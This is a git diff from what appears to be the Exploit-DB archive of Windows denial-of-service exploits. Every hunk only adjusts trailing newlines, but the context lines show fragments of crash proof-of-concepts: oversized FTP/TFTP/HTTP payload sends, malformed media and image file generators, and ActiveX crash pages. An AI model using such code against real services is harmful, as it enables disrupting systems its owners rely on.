+++ b/platforms/windows/dos/2708.c @@ -214,4 +214,4 @@ int main (int argc, char *argv[]) } -// milw0rm.com [2006-11-03] +// milw0rm.com [2006-11-03] \ No newline at end of file diff --git a/platforms/windows/dos/27089.c b/platforms/windows/dos/27089.c index 5089ce0c0..efeb73abd 100755 --- a/platforms/windows/dos/27089.c +++ b/platforms/windows/dos/27089.c @@ -380,4 +380,4 @@ int main() free(exploitbuf); fwrite( exploitbuf, size, 1, stream ); fclose(stream); -} +} \ No newline at end of file diff --git a/platforms/windows/dos/27113.c b/platforms/windows/dos/27113.c index 0c5bded62..82ab8e270 100755 --- a/platforms/windows/dos/27113.c +++ b/platforms/windows/dos/27113.c @@ -98,5 +98,4 @@ int main(int argc, char **argv) { printf("Now open the torrent in bitcomet and click test\n"); return 0; -} - +} \ No newline at end of file diff --git a/platforms/windows/dos/2715.pl b/platforms/windows/dos/2715.pl index 0f00f9df5..61d698a08 100755 --- a/platforms/windows/dos/2715.pl +++ b/platforms/windows/dos/2715.pl @@ -65,4 +65,4 @@ else } -# milw0rm.com [2006-11-04] +# milw0rm.com [2006-11-04] \ No newline at end of file diff --git a/platforms/windows/dos/2716.pl b/platforms/windows/dos/2716.pl index 2668b493e..48327c108 100755 --- a/platforms/windows/dos/2716.pl +++ b/platforms/windows/dos/2716.pl @@ -38,4 +38,4 @@ print "[+] Sending DOS byte\n"; $data = "GET /$dos \r\n\r\n"; -# milw0rm.com [2006-11-04] +# milw0rm.com [2006-11-04] \ No newline at end of file diff --git a/platforms/windows/dos/27273.txt b/platforms/windows/dos/27273.txt index 5bf045ab0..cb64f4ddf 100755 --- a/platforms/windows/dos/27273.txt +++ b/platforms/windows/dos/27273.txt @@ -132,9 +132,4 @@ target.ConvertToStreamEx arg1 ,arg2 ,arg3 ,arg4 ,arg5 ,arg6 ,arg7 --end - - - - - +-end \ No newline at end of file diff --git a/platforms/windows/dos/27317.txt b/platforms/windows/dos/27317.txt index e5fcdcd4a..d79b9c2d1 100755 --- a/platforms/windows/dos/27317.txt +++ b/platforms/windows/dos/27317.txt @@ -59,4 +59,4 @@ arg1="http://test\test\test\te?s\test\test\tes\ttest\test\te@st\tes\test\test\te target.ToDot arg1 -</script> +</script> \ No newline at end of file diff --git a/platforms/windows/dos/2734.py b/platforms/windows/dos/2734.py index cc2aa3cac..c1d87a2c6 100755 --- a/platforms/windows/dos/2734.py +++ b/platforms/windows/dos/2734.py @@ -83,4 +83,4 @@ except: except: print "[!] Ok. Server is dead, exploit successfully executed. " -# milw0rm.com [2006-11-07] +# milw0rm.com [2006-11-07] \ No newline at end of file diff --git a/platforms/windows/dos/2735.py b/platforms/windows/dos/2735.py index e561da0e3..b7989178e 100755 --- a/platforms/windows/dos/2735.py +++ b/platforms/windows/dos/2735.py @@ -52,4 +52,4 @@ except: except: print "[!] Ok. Server is dead, exploit successfully executed. " -# milw0rm.com [2006-11-07] +# milw0rm.com [2006-11-07] \ No newline at end of file diff --git a/platforms/windows/dos/27553.py b/platforms/windows/dos/27553.py index ff0f5b19d..75b16aeb6 100755 --- a/platforms/windows/dos/27553.py +++ b/platforms/windows/dos/27553.py @@ -18,4 +18,4 @@ buf = ( s = socket(AF_INET, SOCK_STREAM) s.connect(("192.168.1.143", 8080)) s.send(buf) -s.close() +s.close() \ No newline at end of file diff --git a/platforms/windows/dos/276.delphi b/platforms/windows/dos/276.delphi index 650fcf6de..53dafc912 100755 --- a/platforms/windows/dos/276.delphi +++ b/platforms/windows/dos/276.delphi @@ -253,4 +253,4 @@ Sleep(Delay); end; end. -// milw0rm.com [2004-04-22] +// milw0rm.com [2004-04-22] \ No newline at end of file diff --git a/platforms/windows/dos/2783.html b/platforms/windows/dos/2783.html index a8195841e..1d836913a 100755 --- a/platforms/windows/dos/2783.html +++ b/platforms/windows/dos/2783.html @@ -43,4 +43,4 @@ end sub </BODY> </HTML> -# milw0rm.com [2006-11-14] +# milw0rm.com [2006-11-14] \ No newline at end of file diff --git a/platforms/windows/dos/2787.c b/platforms/windows/dos/2787.c index 2717c6b5f..444274f2d 100755 --- a/platforms/windows/dos/2787.c +++ b/platforms/windows/dos/2787.c @@ -132,4 +132,4 @@ if (WSAStartup(MAKEWORD(1, 1), &wsaData) < 0) WSACleanup(); } -// milw0rm.com [2006-11-15] +// milw0rm.com [2006-11-15] \ No newline at end of file diff --git a/platforms/windows/dos/28169.html b/platforms/windows/dos/28169.html index 54123db60..e2099e1ad 100755 --- a/platforms/windows/dos/28169.html +++ b/platforms/windows/dos/28169.html @@ -20,4 +20,4 @@ Clicking the button below may crash your browser!<br><br> <input type='button' onClick='Demo()' value='Start Demo!'> -</body></html> +</body></html> \ No newline at end of file diff --git a/platforms/windows/dos/28237.py b/platforms/windows/dos/28237.py index 493828f46..94562de9e 100755 --- a/platforms/windows/dos/28237.py +++ b/platforms/windows/dos/28237.py @@ -17,5 +17,4 @@ string=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01" filename = "crash.wav" file = open(filename , "w") file.write(string) -file.close() - +file.close() \ No newline at end of file diff --git a/platforms/windows/dos/28266.txt b/platforms/windows/dos/28266.txt index 8c70bd1ca..f74d94788 100755 --- a/platforms/windows/dos/28266.txt +++ b/platforms/windows/dos/28266.txt @@ -14,4 +14,4 @@ Or: SIP/A 1 AAAAAAAA[approx-48-bytes]AAAAAA From: test -To: test +To: test \ No newline at end of file diff --git a/platforms/windows/dos/28299.pl b/platforms/windows/dos/28299.pl index 7a925f727..a219284d2 100755 --- a/platforms/windows/dos/28299.pl +++ b/platforms/windows/dos/28299.pl @@ -136,4 +136,4 @@ open(Niega, ">Poc.ico") || die "Can't Write temporary File\n"; binmode (Niega); print Niega $all; close (Niega); -print "Peace out..\n"; +print "Peace out..\n"; \ No newline at end of file diff --git a/platforms/windows/dos/28375.pl b/platforms/windows/dos/28375.pl index 8c25f736a..9de199f24 100755 --- a/platforms/windows/dos/28375.pl +++ b/platforms/windows/dos/28375.pl @@ -122,4 +122,4 @@ $invptr = "\x41\x41" x 707; ################################################; open fp, ">./$file" || die "\n[-] Can't open $file: $!\n\n"; print fp $patter.$invptr; close fp; print "\n\n\x20\x20\x1A\x20File \"$file\" created successfully!\x20"; -$file = -s $file; print "($file bytes)\n\n"; +$file = -s $file; print "($file bytes)\n\n"; \ No newline at end of file diff --git a/platforms/windows/dos/28395.txt b/platforms/windows/dos/28395.txt index 4cd021167..b3b1b3721 100755 --- a/platforms/windows/dos/28395.txt +++ b/platforms/windows/dos/28395.txt @@ -33,4 +33,4 @@ This issue affects VMware version 5.5.1; other versions may also be vulnerable f } </script> </body></html> - =============== vmware.htm end ================== + =============== vmware.htm end ================== \ No newline at end of file diff --git a/platforms/windows/dos/28401.html b/platforms/windows/dos/28401.html index b3be4d65b..1dac62bbd 100755 --- a/platforms/windows/dos/28401.html +++ b/platforms/windows/dos/28401.html @@ -43,4 +43,4 @@ This BID may be related to the issues described in BID 14511 (Microsoft Internet <!-- </body> <script>location.reload();</script> -</html> +</html> \ No newline at end of file diff --git a/platforms/windows/dos/28463.html b/platforms/windows/dos/28463.html index 61b1ecacb..c76e4c18c 100755 --- a/platforms/windows/dos/28463.html +++ b/platforms/windows/dos/28463.html @@ -28,4 +28,4 @@ arg1 = buffer + ecx + junk target.PEstrarg1 = arg1 -</script> +</script> \ No newline at end of file diff --git a/platforms/windows/dos/2854.py b/platforms/windows/dos/2854.py index 5933822c5..356eb78bb 100755 --- a/platforms/windows/dos/2854.py +++ b/platforms/windows/dos/2854.py @@ -35,4 +35,4 @@ mode = "netascii" data = "\x00\x02" + filename + "\0" + mode + "\0" s.sendto(data, (host, port)) -# milw0rm.com [2006-11-27] +# milw0rm.com [2006-11-27] \ No newline at end of file diff --git a/platforms/windows/dos/2855.py b/platforms/windows/dos/2855.py index 85a4a4e18..f9e6ffe69 100755 --- a/platforms/windows/dos/2855.py +++ b/platforms/windows/dos/2855.py @@ -40,4 +40,4 @@ mode = "netascii" + "A" * 469 da = "\x00\x02" + filename + "\0" + mode + "\0" s.sendto(da, (host, port)) -# milw0rm.com [2006-11-27] +# milw0rm.com [2006-11-27] \ No newline at end of file diff --git a/platforms/windows/dos/2860.c b/platforms/windows/dos/2860.c index 21b7535c2..97aab4f2f 100755 --- a/platforms/windows/dos/2860.c +++ b/platforms/windows/dos/2860.c @@ -96,4 +96,4 @@ int main(int argc, char *argv[]) return 0; } -// milw0rm.com [2006-11-28] +// milw0rm.com [2006-11-28] \ No newline at end of file diff --git a/platforms/windows/dos/2861.c b/platforms/windows/dos/2861.c index 44cf533f3..67d14bf80 100755 --- a/platforms/windows/dos/2861.c +++ b/platforms/windows/dos/2861.c @@ -109,4 +109,4 @@ int main(int argc, char *argv[]) return 0; } -// milw0rm.com [2006-11-28] +// milw0rm.com [2006-11-28] \ No newline at end of file diff --git a/platforms/windows/dos/28650.py b/platforms/windows/dos/28650.py index 2e6f783e4..36b2bf242 100755 --- a/platforms/windows/dos/28650.py +++ b/platforms/windows/dos/28650.py @@ -20,4 +20,4 @@ try: crash.write(exploit); crash.close(); except: - print "[-] No Permissions.." + print "[-] No Permissions.." \ No newline at end of file diff --git a/platforms/windows/dos/2879.py b/platforms/windows/dos/2879.py index 413f5e3cf..4df1bbb1b 100755 --- a/platforms/windows/dos/2879.py +++ b/platforms/windows/dos/2879.py @@ -173,4 +173,4 @@ print "[+] Done" # EoF -# milw0rm.com [2006-12-01] +# milw0rm.com [2006-12-01] \ No newline at end of file diff --git a/platforms/windows/dos/28860.c b/platforms/windows/dos/28860.c index 917f61881..8738f019e 100755 --- a/platforms/windows/dos/28860.c +++ b/platforms/windows/dos/28860.c @@ -118,4 +118,4 @@ int main(int argc, char **argv) { close(sd); return(0); -} +} \ No newline at end of file diff --git a/platforms/windows/dos/2900.py b/platforms/windows/dos/2900.py index 2341bbfa8..b4cc2dbca 100755 --- a/platforms/windows/dos/2900.py +++ b/platforms/windows/dos/2900.py @@ -89,4 +89,4 @@ if __name__ == '__main__': D = DNSserver(localhost) -# milw0rm.com [2006-12-09] +# milw0rm.com [2006-12-09] \ No newline at end of file diff --git a/platforms/windows/dos/2901.php b/platforms/windows/dos/2901.php index 2228edebc..6c0db0825 100755 --- a/platforms/windows/dos/2901.php +++ b/platforms/windows/dos/2901.php @@ -101,4 +101,4 @@ socket_close($socket); ?> -# milw0rm.com [2006-12-09] +# milw0rm.com [2006-12-09] \ No newline at end of file diff --git a/platforms/windows/dos/2914.php b/platforms/windows/dos/2914.php index b33caba79..02272da54 100755 --- a/platforms/windows/dos/2914.php +++ b/platforms/windows/dos/2914.php @@ -64,4 +64,4 @@ socket_close($socket); ?> -# milw0rm.com [2006-12-11] +# milw0rm.com [2006-12-11] \ No newline at end of file diff --git a/platforms/windows/dos/2916.php b/platforms/windows/dos/2916.php index 52148d6ed..57af7e7af 100755 --- a/platforms/windows/dos/2916.php +++ b/platforms/windows/dos/2916.php @@ -54,4 +54,4 @@ else { */ ?> -# milw0rm.com [2006-12-11] +# milw0rm.com [2006-12-11] \ No newline at end of file diff --git a/platforms/windows/dos/2922.txt b/platforms/windows/dos/2922.txt index 66d7f22c5..d7a945f84 100755 --- a/platforms/windows/dos/2922.txt +++ b/platforms/windows/dos/2922.txt @@ -29,4 +29,4 @@ disco. poc: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2922.doc (12122006-djtest.doc) -# milw0rm.com [2006-12-12] +# milw0rm.com [2006-12-12] \ No newline at end of file diff --git a/platforms/windows/dos/2926.py b/platforms/windows/dos/2926.py index 29d8bcf40..05503b1e0 100755 --- a/platforms/windows/dos/2926.py +++ b/platforms/windows/dos/2926.py @@ -30,4 +30,4 @@ s.send('LIST %s\r\n' % buffer) time.sleep(1) s.send('HELP %s\r\n') -# milw0rm.com [2006-12-13] +# milw0rm.com [2006-12-13] \ No newline at end of file diff --git a/platforms/windows/dos/2929.cpp b/platforms/windows/dos/2929.cpp index 574f84973..c1e1f61d7 100755 --- a/platforms/windows/dos/2929.cpp +++ b/platforms/windows/dos/2929.cpp @@ -40,4 +40,4 @@ BOOL WINAPI DllMain( return TRUE; } -// milw0rm.com [2006-12-14] +// milw0rm.com [2006-12-14] \ No newline at end of file diff --git a/platforms/windows/dos/29295.html b/platforms/windows/dos/29295.html index 392265768..b455b5f88 100755 --- a/platforms/windows/dos/29295.html +++ b/platforms/windows/dos/29295.html @@ -29,4 +29,4 @@ works with Internet Explorer 6 & 7 <!-- Just enable the control by clicking on it, then try to close IE. ---> +--> \ No newline at end of file diff --git a/platforms/windows/dos/29307.c b/platforms/windows/dos/29307.c index 7606b4a8d..ccfc300fa 100755 --- a/platforms/windows/dos/29307.c +++ b/platforms/windows/dos/29307.c @@ -2672,4 +2672,4 @@ int main(int argc, char *argv[]) } CloseHandle(fileHandle); return 0; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/2934.php b/platforms/windows/dos/2934.php index 5c38f323b..0467a91a3 100755 --- a/platforms/windows/dos/2934.php +++ b/platforms/windows/dos/2934.php @@ -102,4 +102,4 @@ socket_close($socket); */ ?> -# milw0rm.com [2006-12-15] +# milw0rm.com [2006-12-15] \ No newline at end of file diff --git a/platforms/windows/dos/2935.sh b/platforms/windows/dos/2935.sh index 35729f2bf..6ea908864 100755 --- a/platforms/windows/dos/2935.sh +++ b/platforms/windows/dos/2935.sh @@ -9,4 +9,4 @@ perl -e 'print "\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00"' > example.mid -# milw0rm.com [2006-12-15] +# milw0rm.com [2006-12-15] \ No newline at end of file diff --git a/platforms/windows/dos/29387.pl b/platforms/windows/dos/29387.pl index 66211f355..f600b2cd9 100755 --- a/platforms/windows/dos/29387.pl +++ b/platforms/windows/dos/29387.pl @@ -149,4 +149,4 @@ print "Buffer size: " . length($buffer) . "\n"; # which makes this approach innefective for addressing (but possibly useful for shellcode) # I didn't have the time to investigate this any further but I figured I'd post this POC -# in case someone else wants to give it a go +# in case someone else wants to give it a go \ No newline at end of file diff --git a/platforms/windows/dos/2942.py b/platforms/windows/dos/2942.py index 8965843ff..f52650c39 100755 --- a/platforms/windows/dos/2942.py +++ b/platforms/windows/dos/2942.py @@ -37,4 +37,4 @@ s.close() print '[+] Done, shutdown.' -# milw0rm.com [2006-12-17] +# milw0rm.com [2006-12-17] \ No newline at end of file diff --git a/platforms/windows/dos/2946.html b/platforms/windows/dos/2946.html index a549b27cb..d24f49ee3 100755 --- a/platforms/windows/dos/2946.html +++ b/platforms/windows/dos/2946.html @@ -23,4 +23,4 @@ works with Internet Explorer 6 & 7 Just enable the control by clicking on it, then try to close IE. --> -# milw0rm.com [2006-12-18] +# milw0rm.com [2006-12-18] \ No newline at end of file diff --git a/platforms/windows/dos/29503.py b/platforms/windows/dos/29503.py index c239e61ea..3ac57c074 100755 --- a/platforms/windows/dos/29503.py +++ b/platforms/windows/dos/29503.py @@ -33,4 +33,4 @@ try: connection.send(request) print i except: - print "Unable to connect. exiting." + print "Unable to connect. exiting." \ No newline at end of file diff --git a/platforms/windows/dos/2952.py b/platforms/windows/dos/2952.py index fb0c44385..5f1d50725 100755 --- a/platforms/windows/dos/2952.py +++ b/platforms/windows/dos/2952.py @@ -31,4 +31,4 @@ time.sleep(2) s.send('PASV %s\r\n' % buffer) #You can change PASV with LIST, USER, PORT, etc... time.sleep(2) -# milw0rm.com [2006-12-19] +# milw0rm.com [2006-12-19] \ No newline at end of file diff --git a/platforms/windows/dos/29558.c b/platforms/windows/dos/29558.c index ccf444ad3..c5f055bf1 100755 --- a/platforms/windows/dos/29558.c +++ b/platforms/windows/dos/29558.c @@ -156,5 +156,4 @@ this function.\n"); printf("\nTEST FAILED!\n"); return 1; -} - +} \ No newline at end of file diff --git a/platforms/windows/dos/29613.txt b/platforms/windows/dos/29613.txt index 70668e08b..a7f157f69 100755 --- a/platforms/windows/dos/29613.txt +++ b/platforms/windows/dos/29613.txt @@ -61,4 +61,4 @@ open(FILE, ">$file"); print FILE $buffer; close(FILE); print "Exploit file [" . $file . "] created\n"; -print "Buffer size: " . length($buffer) . "\n"; +print "Buffer size: " . length($buffer) . "\n"; \ No newline at end of file diff --git a/platforms/windows/dos/29617.pl b/platforms/windows/dos/29617.pl index f83394452..6f0373b35 100755 --- a/platforms/windows/dos/29617.pl +++ b/platforms/windows/dos/29617.pl @@ -46,5 +46,4 @@ print OUTPUTFILE "\">\n<groups><group>some group</group></groups>\n<segments>\n< print OUTPUTFILE $file_end; # End of file -close(OUTFILE); - +close(OUTFILE); \ No newline at end of file diff --git a/platforms/windows/dos/2966.html b/platforms/windows/dos/2966.html index cc5825b57..c4acf48a1 100755 --- a/platforms/windows/dos/2966.html +++ b/platforms/windows/dos/2966.html @@ -22,4 +22,4 @@ RealPlayer.Initialize("AA","defaultV") Just initialize the control, the close IE :) --> -# milw0rm.com [2006-12-20] +# milw0rm.com [2006-12-20] \ No newline at end of file diff --git a/platforms/windows/dos/29660.txt b/platforms/windows/dos/29660.txt index 175500985..fe700172b 100755 --- a/platforms/windows/dos/29660.txt +++ b/platforms/windows/dos/29660.txt @@ -8,4 +8,4 @@ Microsoft Office 2003 is vulnerable to this issue; other versions may also be af Note: IrfanView version 3.99 is also vulnerable to this issue. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/29660.wmf +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/29660.wmf \ No newline at end of file diff --git a/platforms/windows/dos/2967.cs b/platforms/windows/dos/2967.cs index 0863795bd..b149bc76c 100755 --- a/platforms/windows/dos/2967.cs +++ b/platforms/windows/dos/2967.cs @@ -20,4 +20,4 @@ class HelloWorldFromMicrosoft // >> csc /unsafe mbox.cs // >> mbox.exe -// milw0rm.com [2006-12-20] +// milw0rm.com [2006-12-20] \ No newline at end of file diff --git a/platforms/windows/dos/2972.c b/platforms/windows/dos/2972.c index 497eb6d0f..b2f329ec9 100755 --- a/platforms/windows/dos/2972.c +++ b/platforms/windows/dos/2972.c @@ -109,4 +109,4 @@ int main(int argc, char *argv[]) return 0; } -// milw0rm.com [2006-12-21] +// milw0rm.com [2006-12-21] \ No newline at end of file diff --git a/platforms/windows/dos/29721.pl b/platforms/windows/dos/29721.pl index e6094f24e..8afb8f822 100755 --- a/platforms/windows/dos/29721.pl +++ b/platforms/windows/dos/29721.pl @@ -30,4 +30,4 @@ while(accept(CLIENT,SOCKET)){ select((select(CLIENT), $|=1)[0]); print CLIENT ":-psyBNC!~cjd\@ef.net PRIVMSG luser : :($code\r\n"; } -close(SOCKET); +close(SOCKET); \ No newline at end of file diff --git a/platforms/windows/dos/2978.py b/platforms/windows/dos/2978.py index 32ee92995..03997e2ce 100755 --- a/platforms/windows/dos/2978.py +++ b/platforms/windows/dos/2978.py @@ -21,4 +21,4 @@ time.sleep(2) s.send('USER %s\r\n' % "%n") # or use every available command or really what you like time.sleep(2) # I try to use CFGHT command and it works :) -# milw0rm.com [2006-12-22] +# milw0rm.com [2006-12-22] \ No newline at end of file diff --git a/platforms/windows/dos/29800.py b/platforms/windows/dos/29800.py index e993d1892..f31da4872 100755 --- a/platforms/windows/dos/29800.py +++ b/platforms/windows/dos/29800.py @@ -38,5 +38,4 @@ try: fileOut.close() print "\nFILE CREATED!\n'NJOY IT...\n" except: - print "\nUNABLE TO CREATE FILE!\n" - + print "\nUNABLE TO CREATE FILE!\n" \ No newline at end of file diff --git a/platforms/windows/dos/29810.c b/platforms/windows/dos/29810.c index 30ce1895e..c6dc6704d 100755 --- a/platforms/windows/dos/29810.c +++ b/platforms/windows/dos/29810.c @@ -78,4 +78,4 @@ int main(int argc,char **argv) printf("\nTEST FAILED!\n"); return 1; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/29816.c b/platforms/windows/dos/29816.c index 27105038e..d89420f2a 100755 --- a/platforms/windows/dos/29816.c +++ b/platforms/windows/dos/29816.c @@ -116,4 +116,4 @@ buf2[i+1]=254; i+=255; } writebmp("rle8of4.bmp",16,1,8,1,buf,256,buf2,1000000); -} +} \ No newline at end of file diff --git a/platforms/windows/dos/29818.c b/platforms/windows/dos/29818.c index c292aefab..d0a8a3512 100755 --- a/platforms/windows/dos/29818.c +++ b/platforms/windows/dos/29818.c @@ -116,4 +116,4 @@ buf2[i+1]=254; i+=255; } writebmp("rle8of4.bmp",16,1,8,1,buf,256,buf2,1000000); -} +} \ No newline at end of file diff --git a/platforms/windows/dos/29819.c b/platforms/windows/dos/29819.c index 9632cb8d4..1896b93e9 100755 --- a/platforms/windows/dos/29819.c +++ b/platforms/windows/dos/29819.c @@ -116,4 +116,4 @@ buf2[i+1]=254; i+=255; } writebmp("rle8of4.bmp",16,1,8,1,buf,256,buf2,1000000); -} +} \ No newline at end of file diff --git a/platforms/windows/dos/2985.pl b/platforms/windows/dos/2985.pl index be677e360..b7f663ba5 100755 --- a/platforms/windows/dos/2985.pl +++ b/platforms/windows/dos/2985.pl @@ -31,4 +31,4 @@ $sock->send("REST $data\r\n"); print "Server exploited\n"; -# milw0rm.com [2006-12-23] +# milw0rm.com [2006-12-23] \ No newline at end of file diff --git a/platforms/windows/dos/29860.c b/platforms/windows/dos/29860.c index daac0c117..564d84223 100755 --- a/platforms/windows/dos/29860.c +++ b/platforms/windows/dos/29860.c @@ -80,4 +80,4 @@ int main(int argc,char **argv) printf("\nTEST FAILED!\n"); return 1; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/29867.xml b/platforms/windows/dos/29867.xml index d0ce7c42a..7480f7a71 100755 --- a/platforms/windows/dos/29867.xml +++ b/platforms/windows/dos/29867.xml @@ -15,4 +15,4 @@ arg=String(4000, "A") target.AddAllowed arg -</script></job></package> +</script></job></package> \ No newline at end of file diff --git a/platforms/windows/dos/29896.c b/platforms/windows/dos/29896.c index f96250b52..977892f9a 100755 --- a/platforms/windows/dos/29896.c +++ b/platforms/windows/dos/29896.c @@ -58,4 +58,4 @@ An attacker can exploit this issue to crash the affected application, denying se printf("[+]BMP File %s Successfuly Created...\n",INV_PIC); return 0; - } + } \ No newline at end of file diff --git a/platforms/windows/dos/299.c b/platforms/windows/dos/299.c index ada29b8b0..858c54b10 100755 --- a/platforms/windows/dos/299.c +++ b/platforms/windows/dos/299.c @@ -409,4 +409,4 @@ main(int argc, char **argv) -// milw0rm.com [2004-05-16] +// milw0rm.com [2004-05-16] \ No newline at end of file diff --git a/platforms/windows/dos/29934.py b/platforms/windows/dos/29934.py index c566058ae..92475bf1b 100755 --- a/platforms/windows/dos/29934.py +++ b/platforms/windows/dos/29934.py @@ -29,4 +29,4 @@ try: fo.close(); print "create succsess file" except: - print "create error !" + print "create error !" \ No newline at end of file diff --git a/platforms/windows/dos/29942.c b/platforms/windows/dos/29942.c index 0d12242ee..52109488d 100755 --- a/platforms/windows/dos/29942.c +++ b/platforms/windows/dos/29942.c @@ -82,4 +82,4 @@ int main(){ //// //// ////////////////////////////////////////// [ E O F ] -//////////////////////////////////////////////////// +//////////////////////////////////////////////////// \ No newline at end of file diff --git a/platforms/windows/dos/29943.c b/platforms/windows/dos/29943.c index 02810d9e5..d52dd0b4c 100755 --- a/platforms/windows/dos/29943.c +++ b/platforms/windows/dos/29943.c @@ -37,4 +37,4 @@ close($socket); print ":-; Attack Complete\n"; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/29949.c b/platforms/windows/dos/29949.c index 458b32f81..be556aa31 100755 --- a/platforms/windows/dos/29949.c +++ b/platforms/windows/dos/29949.c @@ -168,5 +168,4 @@ int main (int argc, char *argv[]) { fclose (fp); return 0; -} - +} \ No newline at end of file diff --git a/platforms/windows/dos/30046.py b/platforms/windows/dos/30046.py index 9e6d1b452..97987e58b 100755 --- a/platforms/windows/dos/30046.py +++ b/platforms/windows/dos/30046.py @@ -133,5 +133,4 @@ caloggerd.exe DoS (camt70.dll)' caloggerd.exe DoS (camt70.dll)' print '[+] Author: Shirkdog' - GetCALoggerPort(target) - + GetCALoggerPort(target) \ No newline at end of file diff --git a/platforms/windows/dos/30104.nasl b/platforms/windows/dos/30104.nasl index d5bc21d40..97905d805 100755 --- a/platforms/windows/dos/30104.nasl +++ b/platforms/windows/dos/30104.nasl @@ -73,4 +73,4 @@ buf = http_get(item:"/fsms/fsmsh.dll?FSMSCommand=GetVersion", port:port); r = http_keepalive_send_recv(port:port, data:buf, bodyonly:1); if( r == NULL ) { security_hole(port); -} +} \ No newline at end of file diff --git a/platforms/windows/dos/3013.py b/platforms/windows/dos/3013.py index 3d51f212b..2b9c06d58 100755 --- a/platforms/windows/dos/3013.py +++ b/platforms/windows/dos/3013.py @@ -124,4 +124,4 @@ print "[+] Done" # EoF -# milw0rm.com [2006-12-25] +# milw0rm.com [2006-12-25] \ No newline at end of file diff --git a/platforms/windows/dos/30224.py b/platforms/windows/dos/30224.py index aa7486538..daf2c0bec 100755 --- a/platforms/windows/dos/30224.py +++ b/platforms/windows/dos/30224.py @@ -43,5 +43,4 @@ data = s.recv(1024) s.close() print 'Received', repr(data) -print service + " crashed" - +print service + " crashed" \ No newline at end of file diff --git a/platforms/windows/dos/30233.pl b/platforms/windows/dos/30233.pl index aa033b4fe..d465ee094 100755 --- a/platforms/windows/dos/30233.pl +++ b/platforms/windows/dos/30233.pl @@ -43,4 +43,4 @@ address!\n"; print $socket $request; close($socket); -} +} \ No newline at end of file diff --git a/platforms/windows/dos/30252.py b/platforms/windows/dos/30252.py index febb9971e..10f1c5613 100755 --- a/platforms/windows/dos/30252.py +++ b/platforms/windows/dos/30252.py @@ -50,5 +50,4 @@ try: time.sleep(2) except: - print "- Nu m-am putut conecta." - + print "- Nu m-am putut conecta." \ No newline at end of file diff --git a/platforms/windows/dos/3030.html b/platforms/windows/dos/3030.html index 38f9e2f15..a26e96f1a 100755 --- a/platforms/windows/dos/3030.html +++ b/platforms/windows/dos/3030.html @@ -47,4 +47,4 @@ </span></span> </code></pre> -# milw0rm.com [2006-12-28] +# milw0rm.com [2006-12-28] \ No newline at end of file diff --git a/platforms/windows/dos/3034.py b/platforms/windows/dos/3034.py index 99f89f88b..8c92cb422 100755 --- a/platforms/windows/dos/3034.py +++ b/platforms/windows/dos/3034.py @@ -17,4 +17,4 @@ for i in range (0,100): connection.connect((host, port)) connection.send("GET / HTTP/1.0 \n\n") -# milw0rm.com [2006-12-28] +# milw0rm.com [2006-12-28] \ No newline at end of file diff --git a/platforms/windows/dos/3038.php b/platforms/windows/dos/3038.php index 60938ab86..193274827 100755 --- a/platforms/windows/dos/3038.php +++ b/platforms/windows/dos/3038.php @@ -38,4 +38,4 @@ sleep(1); } ?> -# milw0rm.com [2006-12-29] +# milw0rm.com [2006-12-29] \ No newline at end of file diff --git a/platforms/windows/dos/3041.html b/platforms/windows/dos/3041.html index 5ced21ff7..df85072c7 100755 --- a/platforms/windows/dos/3041.html +++ b/platforms/windows/dos/3041.html @@ -20,4 +20,4 @@ Flash8b.AllowScriptAccess=arg1 </script> -# milw0rm.com [2006-12-29] +# milw0rm.com [2006-12-29] \ No newline at end of file diff --git a/platforms/windows/dos/30414.py b/platforms/windows/dos/30414.py index c4ca19f11..9ede31646 100755 --- a/platforms/windows/dos/30414.py +++ b/platforms/windows/dos/30414.py @@ -18120,4 +18120,4 @@ poc = ("\x52\x49\x46\x46\xe8\x69\x04\x00\x41\x56\x49\x20\x4c\x49\x53\x54" filename = "gomPlayer.avi" file = open(filename , "w") file.write(poc) -file.close() +file.close() \ No newline at end of file diff --git a/platforms/windows/dos/3042.html b/platforms/windows/dos/3042.html index 2a8aba08c..c893d4242 100755 --- a/platforms/windows/dos/3042.html +++ b/platforms/windows/dos/3042.html @@ -20,4 +20,4 @@ ShockW.swURL = arg1 </script> -# milw0rm.com [2006-12-29] +# milw0rm.com [2006-12-29] \ No newline at end of file diff --git a/platforms/windows/dos/30455.txt b/platforms/windows/dos/30455.txt index 8f53fb18f..d777a786c 100755 --- a/platforms/windows/dos/30455.txt +++ b/platforms/windows/dos/30455.txt @@ -13,4 +13,4 @@ This issue affects Internet Explorer 6. (http://hamachiya.com/junk/ie_crash.html) --> -<style>*{position:relative}</style><table><input> +<style>*{position:relative}</style><table><input> \ No newline at end of file diff --git a/platforms/windows/dos/3052.c b/platforms/windows/dos/3052.c index f39e2efe7..da6cd1bc1 100755 --- a/platforms/windows/dos/3052.c +++ b/platforms/windows/dos/3052.c @@ -257,4 +257,4 @@ int main() } -// milw0rm.com [2006-12-31] +// milw0rm.com [2006-12-31] \ No newline at end of file diff --git a/platforms/windows/dos/3056.pl b/platforms/windows/dos/3056.pl index 8c118e8aa..6683cb375 100755 --- a/platforms/windows/dos/3056.pl +++ b/platforms/windows/dos/3056.pl @@ -40,4 +40,4 @@ $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => } } -# milw0rm.com [2006-12-31] +# milw0rm.com [2006-12-31] \ No newline at end of file diff --git a/platforms/windows/dos/30590.txt b/platforms/windows/dos/30590.txt index 4ce0d32a4..c52b58de3 100755 --- a/platforms/windows/dos/30590.txt +++ b/platforms/windows/dos/30590.txt @@ -6,4 +6,4 @@ Attackers can exploit these issues to cause a denial of service or to write mali WinImage 8.0 and 8.10 are vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30590.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30590.zip \ No newline at end of file diff --git a/platforms/windows/dos/30593.txt b/platforms/windows/dos/30593.txt index 2293f0f9f..96d42d057 100755 --- a/platforms/windows/dos/30593.txt +++ b/platforms/windows/dos/30593.txt @@ -16,4 +16,4 @@ sub OuCh() Var_0 = String(620, "A") pAF.ListFiles Var_0 End Sub -</script> +</script> \ 